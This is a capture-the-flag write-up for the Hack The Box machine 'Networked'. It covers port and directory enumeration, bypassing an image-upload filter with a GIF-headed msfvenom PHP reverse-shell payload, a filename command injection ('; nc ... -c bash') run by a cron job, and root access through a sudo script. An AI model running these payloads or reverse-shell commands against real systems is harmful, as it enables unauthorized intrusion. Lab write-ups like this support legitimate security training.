Networked Writeup

Hello fellow hackers,,, today we are going to solve Networked from hack the box

It’s a great easy box to solve!!! , so lets get started….

I started with nmap to scan the open ports on the machine 

Namp  -A  -v  -sT  10.10.10.146

      The box have two ports open : 

1. Port 22 running ssh service 
2. Port 80 running HTTP server 

I  checked the services if its vulnerable to public exploits and found nothing 

The services are up to date .

Now let’s check the web server

After going to the web server i found a message from the admin asking to fund his project and inviting us to his pool party , sounds cool!!!

I started to enumerate the directories using gobuster 

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt dir -u https://10.10.10.146

Right away it popped out a directory called backup , sounds interesting? Let’s check it out 

Inside it i found a .tar file called backp.tar after checking it out I found it a backup of the pages source code 

After going to the pages I found an upload utility under upload.php

That can only accept images , going through the php code that we have of the page  

It filters the uploaded photos using a white list filter 

So in order to bypass it i generated a php payload using msfvenom and i saved it in a double extension file 

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.92 LPORT=1995 -f raw > shell.php.jpeg 

Then i upload it to the server but i got rejected again 

So it’s checking the code somehow so in order to bypass i added the GIF image header at the beginning of the payload file to fool the scan GIF89a; 

Then i uploaded it and it passed!!!

It gave a message saying that the file is uploaded and to refresh the gallery

The gallery is under  /photos.php 

I fire up my listener and went to /photos.php and refresh it , and we got a shell!!! 

We are in as apache user, going to the home directory I found a directory for user guly i couldn’t read the user flag but i was able to read the check_attack.php file 

And crontab.guly file 

The check_attack.php file checks if the files in the upload directory containing in there name an ip, if so,  it sends it to log_path then delete it using rm command 

the script is set to a cronJop to run every 3 minutes

So let’s exploit it!!!!

Going to upload directory, i created a file using touch command as follows 

touch '; nc 10.10.14.92 1995 -c bash'

So what will happen here is when the script run and found an ip address in my file name it will send it to log path and then execute rm command so the semicolon will inject the nc command and execute it!!!

I set my listener and waited to the script to run, after 3 minutes we have a shell for user guly !!!! 

Now to the root access 

After some basic enumeration 

I ran sudo  -l command

User guly is allowed to run sudo command with no password to changename.sh script 

After running the script several times I tried to inject a command in every line of the script as follows  \  /bin/bash  and we popped out a root shell !!! 

SMT Red Team